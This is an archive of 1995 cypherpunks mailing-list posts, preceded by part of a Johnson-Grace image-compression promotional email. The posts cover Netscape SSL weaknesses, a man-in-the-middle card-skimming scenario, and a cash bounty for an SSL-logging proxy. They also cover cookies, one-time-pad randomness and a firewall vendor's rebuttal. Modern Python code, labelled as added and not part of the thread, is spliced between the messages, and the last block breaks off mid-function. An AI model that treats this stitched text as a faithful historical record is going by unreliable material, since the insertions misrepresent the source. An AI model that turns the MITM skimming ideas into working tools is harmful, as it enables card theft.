Web site, Johnson-Grace is offering publishers the latest copy of our ART
Press(TM) on a FREE trial basis for the remainder of calendar 1995. ART
Press lets you easily convert your images to the ART format with its unique
Web and online publishing features. For example, our proprietary Splash(TM)
feature displays a full-size image in roughly one second; the image then
becomes sharper as more detail is received and decompressed in additional
layers, producing a high-quality final image within seconds.

To get your free trial copy of ART Press, simply sign up for the
"Johnson-Grace Publishers Program," a new program designed specially for Web
and online publishers. At the foot of this email is an enrollment form. Just
fill it out and email or fax it back to us. We'll send you the software
right away (usually within 24 hours).  For even faster results, just sign up
online through the Johnson-Grace Web site (http://www.jgc.com/).

Besides receiving ART Press, another prime benefit of joining our Publishers
Program is that you will be automatically notified when any new versions of
the software become available. Here are two more benefits: 
 
* FREE Technical Support -- For the remainder of calendar 1995 you will
receive free expert technical advice on using ART Press. Support is
available by email or by phone.

* FREE Image Compression -- To help you get started with ART Press,
Johnson-Grace will compress your original images into the ART format free of
charge. Simply provide them to us in BMP, TIFF, or PICT format, and we'll do
the rest.

We've devised a method for allowing both ART and non-ART images to be
accessed from your Web site depending on whether or not an ART-enabled
browser is being used. Johnson-Grace and some of the larger browser
companies have introduced a new extension to HTML, the X-ALTSRC attribute in
the <IMG> tag. (<IMG> is the standard tag used to insert images into a Web
page.)  It indicates to ART-enabled Web browsers that an ART image is
present. When an X-ALTSRC attribute is found, ART-enabled browsers will
automatically use the ART image named in it, bypassing a SRC attribute it
may find naming a GIF (or JPEG) image. Browsers that do not recognize the
X-ALTSRC attribute will ignore it and read the SRC attribute instead, so
there's no risk of incompatibility with these "old-style" browsers.

Currently, AOL's built-in TurboWeb browser as well as other Web browsers
including GNN and TeacherSoft recognize this new HTML attribute,
representing a community of well over three and a half million users.  As
announced by Netscape, Johnson-Grace will be one of the first companies to
provide a free plug-in for Netscape 2.0 which will allow Netscape users to
take advantage of the ART format.  This plug-in will be delivered as a
"virtual bundle" so that support for the ART format will be automatically
added to the browser the first time an ART image is encountered.
Additionally, Johnson-Grace is in discussions with all the other major Web
browser companies to include ART technology in their products. We expect
broad support by the end of the year.  

Check out the Johnson-Grace Web site (http://www.jgc.com) to learn more
about how to use ART's triple-speed advantage on your Web site. You'll also
find a host of other useful information there designed specifically for
publishers.

In the months ahead, look for Johnson-Grace to provide additional "Instant
Publishing" capabilities for Web and online service publishers. For example,
later this year you'll see news of ART speech compression technology that
will enable publishers to author interleaved sound and images for real-time
playback at 14,400 bits per second. Think about what real-time sound can do
for your Web pages!

If you have any questions about the program, feel free to email
techsupport@jgc.com. You can also call Tech Support at (714) 759-0700, or
fax us at (714) 729-4643.

Best regards,

Geoff LeBlond
VP, Licensing
Johnson-Grace Company


Enrollment for Johnson-Grace Publishers Program

Please provide the following information to enroll in the Johnson-Grace
Publishers Program

Name:
Title:
Company Name:
Company Address1:
Company Address2:
Company Address3:
Company Address4:
Telephone Number:
Fax Number:
email Address (email address is required to process your request) :

Version of Software needed
[ ] Windows
[ ] Macintosh
[ ] Both

Type of Publisher (select one)
[ ] Newspaper, Magazine, or Newsletter
[ ] Merchant
[ ] Company (e.g., product and sales information)
[ ] Government or Non-Profit Organization
[ ] Other (please specify) :

Target Audience (check all that apply)
[ ] Web
[ ] Online Service(s)
[ ] Both

Web Site Information
(1) Home Page Location (URL):
(2) Launch Date:
(3) Webmaster e-mail address:

Note: By sending this registration form to Johnson-Grace Company, you agree
to follow the following Publishers Program restrictions.

(1) Do not use a trial version of ART Press after the end of the trial
evaluation period.
(2) Only Web and online service publishers -- defined as companies,
organizations, or entities that offer content or information for display on
the Web or on an online service for commercial purposes -- may qualify to
participate in the Johnson-Grace Publishers Program.
(3) Do not distribute copies of the program (all users must enroll), or
attempt to reverse engineer the program.
(4) Report any problems with the program to the Publisher Support Hotline at
internet address techsupport@jgc.com, fax 714-729-4643, or telephone
714-759-0700 (ext. 215 or ext. 230).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 2 Oct 95 19:01:41 PDT
To: cypherpunks@toad.com
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <ac95e6d30d021004e514@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:37 PM 10/2/95, MIGUELDIAZ@megaweb.com () wrote:

>I don't know about everyone else, but a T-shirt seems a very
>small reward for uncovering a "hole" in the encryption
>algorithm of Microsoft products.  Does that apply to any and
>all bugs?? i.e. not necessarily security problems??

You are of course welcome to offer a richer prize.

Meanwhile, Sameer is the one making the offer, so it's not for us to say
he's being cheap.

Also, the history of science is filled with cases where bets with trivial
payoffs intensely motivated people.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Mon, 2 Oct 95 18:48:00 PDT
To: Eric Murray <ericm@lne.com>
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510030147.AA15570@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


> The point to attacking SSL is to be able to decode a message from any
> browser, without having to do anything extraordinary to the victim's host.
> No cryptosystem is proof against an attacker who can see and
> control everything you do on the client side (i.e. has root in UNIX
> parlance).
> 
> So, while your idea #1 might be interesting or fun to do as far as computer
> security goes, it's not an attack on SSL. 

Agreed, within limits. Security as "Marketed" by NetScape goes far past
just claiming SSL to be secure, including the use of NetScape client
and servers as secure. With this expanded model, attacking NetScape's
claim of security includes attacking the process and environment that
they provide to endusers and info mall businesses. In this case
electronically distributing clients in a hostile environment is a gross
disregard for endusers' security needs, traded off for ease of distribution.

I probably should not have included virus attacks, and just focused
upon the main problem ... unsecured network transmission of clients.

As it stands, a third party with minimal trouble can compromise a very
large number of NetScape clients and capture the credit card data for
those users who would otherwise expect their transactions to be secure.

To take the ground that their product is secure in a secure environment
is meaningless ... the product value they seem to offer is security in
a non-secure environment - which I don't think is true, and I gather
you might agree?

> That points out the flaw in Netscape's authentication model that
> others have already pointed out on this list.  Admittedly, like Don
> Stephenson just posted, there's not really a good way to distribute
> and authenticate certificates until there's a ubiquitous global
> CA chain.

Again, we agree that this reflects negatively on NetScape's claims of
security in an unsecure environment?
	
As an aside, readers in private have suggested that a signature by
Verilog as the CA may not be required, quoting that until recently,
NetScape signed their own certificates. This seems that the MITM
can choose his own CA, possibly of his own design to sign false
certificates.
	
> Assume that the attacker Mallet is in the middle and has control of the http
> stream.  Alice clicks on 'open Widget order form' to order a Widget
> and Mallet sends her browser a redirect pointing to his evil web server.
> Alice doesn't notice that the hostname in the url has changed, or
> if she does, she figures that the catalog people have arranged to
> have Mallet's server host their 'secure' transactions (not an unreasonable
> assumption).  Mallet takes the order and pockets the money.
> The hostname in the certificate (Mallet's) matches the hostname
> in the URL (also Mallet's).

Or Mallet places the order in Alice's name deferring the chances of detection
until enough card numbers are acquired to make a run on the bank. There is
tremendous value in forestalling the point of detection and the location of
the MITM becoming known. If Alice gets her goods promptly she is much less
likely to question the transaction.

> Of course this isn't really an attack on SSL per se.  It's an attack on
> the certificate-granting policy- the CA gave a certificate to
> an unscrupulous person (Mallet).

But it is a clear attack on NetScape's advertised "security" for end users.

Almost all successful crooks/thieves have a front business to launder their
money thru. In this case you can steal customers just by redirecting your
competitor's DNS records to your server ... With a similar home page
and ordering/catalog screens they might never notice the switch, certainly
not first time customers. Gee nobody would probably own up to the occasional
named failures that could also cause this.

Somehow I don't think this is what endusers of info mall owners consider
security.

> > > Well of course, if the secret key of the server (or worse yet, certificate 
> > > authority) is compromised, all bets are off.  That's true of just about any 
> > > protocol you can dream up.
> > 
> > I'm not referring to the secret key of _the_ server; I'm referring to the 
> > secret key of _ANY_ server. In the limiting case, such a key can be 
> > obtained by buying one from the CA. 
> 
> Right. That's what I pointed out in an earlier message, although I
> didn't elaborate on it.   The security of Netscape browsers depends
> on Verisign's policy in handing out server certificates.

and on the physical security of the site plus its network connections,
the trustworthiness of its internal staff and contractors, and its ability
to deliver service in the face of failures and disasters, both man made
and natural.

Security includes more than just crypto correctness, in this case it
includes denial of service attacks as well as physical site attacks.

In this case I strongly suspect that bombing Verilog would shutdown
net commerce for a while. Certainly its employees are in a position
to earn high six figures for the key algorithm or a copy of the key
database.

As for the policy, it has to include mom & pops and young business owners
setting out to make their honest fortune on the net ... unfortunately
this profile includes the evil side as well. I don't think restricting
info mall business to the Fortune 500 is what we have in mind here.
As such, I don't think screening by the CA takes us very far at all.

> Backing up for a minute, the same problem holds for those neeto
> credit-card readers that Visa and MasterCharge give out to merchants.
> The merchant can be a crook setting up a 'store-front' operation to charge
> to bogus/stolen card numbers, or the employees can steal using the numbers
> they get in the course of doing business, etc.  There are already
> procedures in place for dealing with this sort of crime.  I'm not
> sure that tricking Verisign into giving out a certificate to a group
> of crackers is really any different than tricking Visa into giving
> a card reader to a group of thieves.

Volume greatly affects the risk factor. Giving a merchant number to a
business means that only the number of people that can walk-in or
phone in to that merchants store are at risk. Stolen cards are handled
differently than stolen numbers. Stolen numbers are cross correlated
by past purchase locations by store, and if possible by register location
and employee. There is a strong pointer to the person(s) involved.

Skimming card numbers off the net has the potential to cross vendors,
geographic areas, and other determinants that would aid in locating the
source of the tap. The number of card numbers exposed has the potential
to be several orders of magnitude higher, and remain undetected for quite
some time. The net offers the ability to place a large number of orders
in a short period of time for very high valued merchandise for delivery
to what would appear proper customers ... and using the UPS/FedEx example
picking off the proceeds in a centralized low security location. With
another computer store front on the net, you turn the same hijacked goods
into full value shipments in a few days ... and maybe coordinate the
bogus orders and hijackings to meet your customers' demands.

Or for an economic terrorist create $100 million in bogus orders and
deliveries to drive the system into failure.

Gone are the days when sheer man-power limited your exposure.  Gone
are the days when a sturdy building, good doors and locks, and a
security system backed by Wells Fargo staff would protect your business.

Security in our network context includes not only the protection of
the individual consumer, but the info mall vendors and the future of
the medium as a viable way to do business. NetScape I believe is working
toward all three of these goals, I strongly disagree with the short
cuts and risks they are taking to get there.

John Bass





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Mon, 2 Oct 95 19:28:43 PDT
To: David_A Wagner <daw@cs.berkeley.edu>
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510030228.AA15693@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry David,

	The offer was for a server/filter/MITM/proxy that logged clear text
not cyphered text for the SSL stream. Combine your program with SSL code
from other sources and 95% of the program is complete. Add to that a way
to produce a valid certificate for the client and you will earn the $50
and a lot of praise for a job well done from everybody.

> > I have a Fifty dollar bill for the first person to submit to the mail box
> > nethack@dmsd.com a working Unix server (with cleartext session logs) which
> > accepts all connections on a unix based host to the www port and redirects
> > them to netscape.com leaving a clear text log of each session's SSL packets
> > in /tmp by session.  All entries become the property of DMS Design. The winner
> > and I will submit a claim for one of Community COnneXion's "I HACKED NETSCAPE"
> > tee shirts as a server hack. (Have Fun!!)
> > 
> 
> This is a trivial program!  I can't believe anyone considers this
> technically difficult.  But hey, who am I to question, if you'll
> pay $50!
> 
> Ok, let me back that up with real code.  Here's a proxy I've been
> using for experimenting, in lieu of root access & tcpdump.

For the rest of you, David gave you a small jump start. Check out the
web pages at C2.org and netscape.com for access to the ssl prototype
code.

Have fun,
John Bass
Owner, DMS Design





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mlm@netscape.com (Mike McCool)
Date: Mon, 2 Oct 95 13:52:22 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape and privacy
In-Reply-To: <44fin4$rdq@tera.mcom.com>
Message-ID: <44pjd7$22b@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin (froomkin@law.miami.edu) wrote:
: With all respect to you and to Netscape (I am one who thinks that the
: Netscape participation on this list has reflected very well on the
: participants and the company), I think that the reply "we only collect IP
: addresses" is not fully responsive to the issue.  While I recognize that
: there are implementations that assign a new IP address to every login, I
: understand the current norm to be static IP addresses.  I sure have one. 
: Thus, if you keep a file of my IP address, and a fact about that address,
: you have a database that can be purchased and correlated with another DB,
: which links IP to something else, eg telephone numbers (perhaps from a
: contest run on the internet?).  Pretty soon we are at serious
: profiling.... 

Well, I'm the one who wrote the server extension in question; I will 
describe exactly how it works.  Let me start off by saying that it does
not work by IP address, and I would not have implemented anything I 
thought was violating privacy.

Originally, the program was called a bean counter.  Why?  Because there
is exactly one file kept on the server: a file with a number in it.  This
number is the total number of "cookies" given out.

When a client connects to www.netscape.com, the server checks to see if
the client sent a cookie with the request.  This cookie has no information
in it, and even if it did, the server doesn't look at it.  If the client
sent a cookie, the server simply goes on to the next task in completing
the request.

If it does not send a cookie, the extension increments the counter, and 
sends the cookie back to the client.  The client records the cookie and
sends it in the future when it is connecting to the server.

So all it does is count the number of "unique" browser installations there
are.  That's all.  The very most information you could get from this is 
that "this particular browser has connected to netscape.com once in the 
past."  Of course this method isn't foolproof, but it gives us a ballpark
figure of how many people are using our browser, which is all we wanted.

I hope this clears things up.  
	--MLM
--
  Mike McCool * mlm@netscape.com * http://www.netscape.com/people/mlm/  
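
The counting scheme described in the message above, written out as an added example (not Netscape's server code). The cookie name and value, the `observed` list and the cookie-discarding browser are assumptions made for illustration; the run shows that the server never receives more than one distinct cookie value, and that a browser which drops cookies is counted again on every visit.

```python
COOKIE_NAME = "counted"   # assumed name; the message does not give one
COOKIE_VALUE = "1"        # assumed: identical for every client, so it names no one


class BeanCounter:
    """Server side: one number is the only state the scheme itself keeps."""

    def __init__(self):
        self.total = 0       # the "file with a number in it"
        self.observed = []   # instrumentation for this example only: what a
                             # log of incoming Cookie headers would contain

    def handle(self, headers):
        """Process one request and return the response headers."""
        cookie = headers.get("Cookie")
        self.observed.append(cookie)
        if cookie is not None:
            return {}        # cookie present: its content is not examined
        self.total += 1      # first contact: count it and hand out the cookie
        return {"Set-Cookie": f"{COOKIE_NAME}={COOKIE_VALUE}"}


class Browser:
    """Client side: stores the cookie and replays it, unless told not to."""

    def __init__(self, keeps_cookies=True):
        self.keeps_cookies = keeps_cookies
        self.jar = None

    def visit(self, server):
        headers = {} if self.jar is None else {"Cookie": self.jar}
        reply = server.handle(headers)
        if self.keeps_cookies and "Set-Cookie" in reply:
            self.jar = reply["Set-Cookie"]


def simulate(browsers, visits_each):
    """Let every browser visit the same server `visits_each` times."""
    server = BeanCounter()
    for _ in range(visits_each):
        for browser in browsers:
            browser.visit(server)
    return server


def distinguishable_clients(server):
    """Distinct cookie values received: 1 means returning visitors all look alike."""
    return len({c for c in server.observed if c is not None})


if __name__ == "__main__":
    normal = simulate([Browser(), Browser(), Browser()], visits_each=4)
    print("installations counted:", normal.total)
    print("distinct cookie values seen:", distinguishable_clients(normal))

    # The "not foolproof" case: one browser never stores the cookie.
    mixed = simulate([Browser(), Browser(), Browser(keeps_cookies=False)], 4)
    print("count with one cookie-discarding browser:", mixed.total)
```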




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cs95rro@brunel.ac.uk (Ryan Richard O'Connell)
Date: Mon, 2 Oct 95 13:51:14 PDT
Subject: Re: More forged cancels
In-Reply-To: <44n926$2dj@sundog.tiac.net>
Message-ID: <44pftr$4jf@ccsp-25.brunel.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Michael R. Grabois (orbit@ix.netcom.com) wrote:
: >From: 73323.603@compuserve.com

: Does this mean that the cancel came from the Compuserve account?

No - he was the original sender of the message. The cancel message must
appear to come from the originator of the post.

-- 
**********************************************
*   Ryan O'Connell <cs95rro@brunel.ac.uk>    *
*  http://http1.brunel.ac.uk:8080/~cs95rro/  *
*    finger:cs95rro@molnir.brunel.ac.uk      *
*   (Includes PGP key and talk location)     *
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Mon, 2 Oct 95 21:28:47 PDT
To: rsalz@osf.org
Subject: Re: Time Lag
Message-ID: <9510030425.AA00286@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> Sending one message and rigorously studying timestamps in the Received
> lines and using that to draw conclusions about mail propagation is a
> complete waste of time.

Ah, but when there seems to be an ongoing pattern of delays, and many
people check many messages and find that indeed there is a pattern,
it's not a waste of time, no?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com ()
Date: Mon, 2 Oct 95 18:38:32 PDT
To: cypherpunks@toad.com
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <199510030135.VAA17223@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date:	Mon, 02 Oct 1995 10:34:32 -0400
>From:	Rick Busdiecker <rfb@lehman.com>
>Sender:	owner-cypherpunks@toad.com
>To:	cypherpunks@toad.com
>bcc:	Lehman Brothers Inc.
>Subject:	`Hack Microsoft' challenge is NYT Computer News Daily's top story
>
>See http://nytsyn.com/live/Lead/275_100295_074418_19095.html
>
>  MICROSOFT BECOMES NEW TARGET OF HACKING CHALLENGE (10/2) 
>
>  By HEATHER GREEN c.1995 Bloomberg Business News 
>
>  BERKELEY, Calif. -- Microsoft Corp. has been chosen as a new target
>  for computer hackers.
>
>  Community Connexion, an Internet service provider that last week
>  promised a free T-shirt to anyone who found a flaw in Netscape
>  Communications Corp.'s software, extended the challenge Friday to
>  include holes in Microsoft products.
>
>  . . .
>

I don't know about everyone else, but a T-shirt seems a very 
small reward for uncovering a "hole" in the encryption 
algorithm of Microsoft products.  Does that apply to any and 
all bugs?? i.e. not necessarily security problems??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Mon, 2 Oct 95 18:56:52 PDT
To: cypherpunks@toad.com
Subject: re: `NOISE' what crypto is that ? [was Re: NT and C2]
Message-ID: <Pine.BSD/.3.91.951002213910.2066A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



>Weld Pond writes:
>[...]
> > http://www.iquest.net/cgi-bin/gate2?|mmMgT008://bbb.PHDx10.ix0/ibLD1P7=
>i/ExUP0e/A1vxiw.T05smgmRibLD1P7iggyR/D1UgM/ppp/6DYsPv/ibLD1P7i/ExUP0e/Ex=
>UP0egMmN1xAUvTgrmNvgmwONgOmyMyYnlXkKCfX,ve8TxU8Di31,nlXk6CllpW,ve8TxU8Di31=
>MRmypd
> > 
>What kind of (en)coding is that ? some kind of rot13++ ?
>

I know it looks funny but that is the actual URL.  I think it is some kind
of verity search engine they use at IQuest.  To get it to work I had to
paste in the 4 lines individually into Netscape because the URL edit
window doesn't seem to do linefeeds. 

It's getting pretty bad when you feel like you should uuencode the URL so 
that people get it straight.  Here is the URL again:

http://www.iquest.net/cgi-bin/gate2?|mmMgT008://bbb.PHDx10.ix0/ibLD1P7i
/ExUP0e/A1vxiw.T05smgmRibLD1P7iggyR/D1UgM/ppp/6DYsPv/ibLD1P7i/ExUP0e/Ex
UP0egMmN1xAUvTgrmNvgmwONgOmyMyYnlXkKCfX,ve8TxU8Di31,nlXk6CllpW,ve8TxU8D
i31MRmypd


      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com ()
Date: Mon, 2 Oct 95 18:49:44 PDT
To: cypherpunks@toad.com
Subject: Re: One-Time-Pad generation from audio device
Message-ID: <199510030146.VAA09247@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date:	Mon, 2 Oct 1995 16:42:04 +0100 (BST)
>From:	"Rev. Mark Grant" <mark@unicorn.com>
>Sender:	owner-cypherpunks@toad.com
>To:	cypherpunks@toad.com
>Subject:	One-Time-Pad generation from audio device
>
>
>Over the weekend I hacked up a one-time-pad generator from the random
>number code I've been writing for Privtool, which uses noise from the
>audio device to generate random numbers.
>
>The code basically reads in a 512-byte block from /dev/audio, then takes
>the MD5 of that block to generate 16 bytes of the OTP. The raw audio data
>I'm getting is not particularly random and will compress by 3:1 using gzip
>or compress, so I'm assuming that using a 32:1 ratio here via MD5 will
>give a truly random output (it's certainly uncompressible).
>
>Before I release the source code to the Net, can anyone give me any good
>reasons to believe that this won't produce physically random output, or
>make suggestions on how to test, or improve, the generated output ? There's
>a #define which can be used to easily increase the amount of data fed into
>the MD5, but at the moment it will only generate about 1 MB per hour on a
>Sparcstation (limited by the audio input rate), so I don't want to
>increase that if I don't have to. 
>
>	Mark

There are many ways to test for randomness. You might want to 
start by accumulating instances of "1" and "0" and over a long 
time you should have roughly an equal number of both.  If you 
have access to a spectrum analyzer with an auto-correlation 
function (or cross-correlation will do) feed in similar 
lengths of output at different time intervals and check to 
ensure a low (close to zero) correlation exists.  Also while 
you are at it you might want to check the output's frequency 
spectrum, it should be fairly uniform across the generating 
range.  Noise (or randomness) which is not normally 
distributed can lead to nasty hacks.

Be Well!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Mon, 2 Oct 95 21:55:48 PDT
To: sameer@c2.org
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <9510030455.AA11218@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



>  Community Connexion, an Internet service provider that last week
>  promised a free T-shirt to anyone who found a flaw in Netscape
>  Communications Corp.'s software, extended the challenge Friday to
>  include holes in Microsoft products.
.......................................

So what message will the T-shirts have on the front, Sameer?

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Glenn Mackintosh <glenn@border.com>
Date: Mon, 2 Oct 95 19:03:51 PDT
To: todd@lgt.com (Todd Glassey)
Subject: Re: Information, We want information
Message-ID: <95Oct2.221648edt.4998@janus.border.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: todd@lgt.com (Todd Glassey)

> I am in immediate need of info on the liabilities of BSD type systems, and in
> particular the BorderWare products.
>
> I heard that in the BorderWare product itself, there are several recently
> discovered potential "holes"...
>
> I have a particular interest in both the Attack MO against the BSD
> platforms in general and the Border products in particular...
>
> Please do not send the reply to the lists but to me personally
> (todd@lgt.com). I will summarize if I get enough info to be worth the
> effort.
>
> Any comments?

Let me make a very clear statement. No site protected by BorderWare has
ever had its Firewall penetrated. Never. 

This is the second time I've heard rumors about insecurities in the
BorderWare software with nothing being brought out to substantiate them.  I
guess this is just an unfortunate part of doing business - especially in the
security domain.  I get a bit annoyed by this kind of thing since,
regardless of whether we refute such comments, after the discussion itself
is forgotten people will often remember that they heard something about a
problem with product X. This isn't a criticism of you Todd - you are just
reporting that you've heard rumors and asking about them, which is a
perfectly reasonable thing to do. 

Obviously the rumors you heard haven't come along with any facts since
you're asking here for the "Attack MO".  I would very much like to hear about
any problem that is real, since if there were any weaknesses we would want
to fix them and disseminate the fix as fast as possible. 

Border takes any potential problem very seriously.  A couple of months ago
there was a potential weakness that was discovered in the process of
Border's ongoing efforts to ensure the security of the product.  It was only
a security risk with a very specific configuration.  No customer has ever
reported seeing this. Within two days of this discovery we had a fix and
the fix was being actively pushed through the distribution channels to the
customer base. It was given high priority and we had our support people
calling down to the reseller channels to ensure that they were aware and
that they got it out to their clients.  We intended to make sure that this
potential problem was immediately removed from the firewall even though no
one had actually reported a problem.

The fix was given free of charge to anyone whether they had a support
contract or not.  Some customers were even upgraded to a newer version of
BorderWare so they could receive the fix.  We strongly believe that our
customers are entitled to the best available protection.  They bought a
Firewall for security and they should expect it to be secure.  Border will
do everything that we can to ensure this is always the case.  So, anyone out
there if you believe you have some real attack mechanism we want to know.

Now that you've sat through the general ranting part of my comments, let me
try to answer the BSD specific part.  As far as BSD based OS's in general I
don't think there is reason to believe that they are any more or less secure
than System V based Unix's (or other non-Unix based operating systems for
that matter).  They all have pro's and con's and they have all had problems
and I don't think that one variant has had more problems historically than
the other. That said, Border doesn't use a stock BSD based OS anyway.  We
have put a large amount of effort into "hardening" the kernel so that it is
a solid base upon which to build a secure firewall.

We don't believe that any stock OS which was designed for a dynamic
environment with users on it will really be secure.  There are far too many
instances (with just about any OS, Unix or otherwise) where someone has
gained privilege or increased access to a system by taking advantage of some
feature once they managed to get on the box.  A firewall should be a static,
non-user environment which means that many features are just not required
and can be removed or their behavior significantly changed and limited. We
spent a considerable amount of manpower stripping down the kernel and
leaving only what was really needed.  We removed the mechanisms which can be
used to gain privilege or increase the levels of access to the system. The
BorderWare kernel is in fact one of its strongest assets, and not a
potential weakness.


Glenn Mackintosh
V.P. Technology
------------------------------------------------------------------------
Border Network Technologies Inc.                 Email: glenn@border.com
20 Toronto Street, Suite 400,                    Tel: +1 416 368 7157
Toronto, Ontario, Canada, M5C 2B8                Fax: +1 416 368 7789




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Mon, 2 Oct 95 19:12:23 PDT
To: cypherpunks@toad.com
Subject: SAIC Ideas SCI
Message-ID: <199510030212.WAA01489@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://baretta.ideas.com/capabilities
    

   SAIC Ideas Group

   7120 Columbia Gateway Dr.
   Columbia, MD 21046-2115
   (410) 312-2000 Fax:(410) 312-2250
   Contact: Bill Howard (410) 312-2060 wjh@ideas.com
   
   [Snip]

   1.2 SAIC acquired the government sectors of IDEAS, Inc. in November
   1994. Now known as the SAIC Ideas Group, this business area
   encompasses 230 technical people (165 SCI cleared) located in a
   company owned 100,000 Sq. Ft. Columbia, Maryland facility.
   
   [Snip]

   2. TECHNICAL SKILLS
   
   The SCI cleared skills mix for the SAIC Ideas Group is listed in the
   table below.

   Table 1: Ideas Group SCI Cleared Skills Mix (7/95)

   Skill Category          SCI Cleared Staff

   Project Management       8
   Software Engineering    48
   Hardware Engineering    10
   Hardware Technician     14
   Test Engineering        24
   ILS                     12
   Training                12
   Systems Engineers       28
   Administrative           9
   
   3. COLUMBIA, MD FACILITIES
    
   The SAIC, Ideas Group, 100,000 square foot building is located at 7120
   Columbia Gateway Drive, Columbia, MD. This facility offers "one-stop
   shopping" for your system and hardware needs.
   
   [Snip]       
   
   3.2 Sensitive Compartmented Information Facility (SCIF) features:
   
   13,000 square foot certified SCIF
   Secure conference areas
   Secure office spaces
   Project rooms
   Raised floor staging areas
   Two large shielded rooms
   Class A storage vault
   Secure STU-III telephone
   Secure Facsimile
       
   The largest SCIF conference room will support approximately 65-75
   people; smaller conference rooms are available. Secure staging areas
   have self-contained environmental control and AC wiring for single or
   three phase, 50 or 60 Hz, power. The staging areas also provide
   separate digital and analog ground radials referenced to a
   single-point independent earth ground to effectively emulate most
   customer locations. Several SCIF areas can be arranged to provide
   secure space -- screened if necessary. Systems with 200 racks of
   equipment have been staged and operated in the Ideas Group SCIF.
   
   [Long snip]

   
_________________________________________________________________

   
   webmaster@ideas.com // (c) Copyright 1995 by Science Application
   International Corporation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 2 Oct 95 14:27:40 PDT
To: Yih-Chun Hu <yihchun@u.washington.edu>
Subject: Re: One-Time-Pad generation from audio device
In-Reply-To: <Pine.OSF.3.91j.951002141954.21670A-100000@saul1.u.washington.edu>
Message-ID: <Pine.3.89.9510022206.A14466-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Oct 1995, Yih-Chun Hu wrote:

> I wouldn't bet on it. I did a similar hack with perl, with a much more
> conservative 5 seconds to 32 bytes. That didn't cut it, when I ent'ed the
> result it gave 6 bits of entropy / 8 bits of output.

How did you measure the entropy of the output ?

> Um.. I would try to generate bits quickly, then securely, so for example
> you get a 2k buffer and do it 5 sec / 128 bits. Then slow down and overwrite
> the buffer and give warnings if the user wants to use the bits too early.

Ah, well the idea is that they can just generate a OTP when they have a 
few spare hours, not that they'd be generating it in real-time. The 
Privtool code does use realtime generation of random numbers, but it has 
a lot of input data other than the audio (e.g. mouse movements, MD5 
hashes, etc).

		Mark
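
Added example, not part of the thread and not Privtool's code: the 512-byte-to-MD5 condensing step and the checks raised in the "One-Time-Pad generation from audio device" messages above (ones/zeros balance, autocorrelation, a bits-per-byte entropy estimate), run on constructed input. The audio stand-in, the cutoffs and the counter-based pad are assumptions; the counter pad is included to show that output can pass every statistical check while containing no entropy at all.

```python
import hashlib
import math
import random
import zlib
from collections import Counter

BLOCK = 512      # raw bytes fed to each MD5 call, as described in the thread
Z_LIMIT = 4.0    # assumed cutoff: |z| above this counts as a failed check


def constructed_audio(n_bytes, seed=1995):
    """Constructed stand-in for /dev/audio samples: a slow tone plus a little
    noise, so it is biased and correlated like the compressible input described."""
    rng = random.Random(seed)
    return bytes(128 + int(40 * math.sin(i / 9.0)) + rng.randint(-3, 3)
                 for i in range(n_bytes))


def condense(raw, block=BLOCK):
    """MD5 every full block of raw input down to 16 pad bytes (32:1)."""
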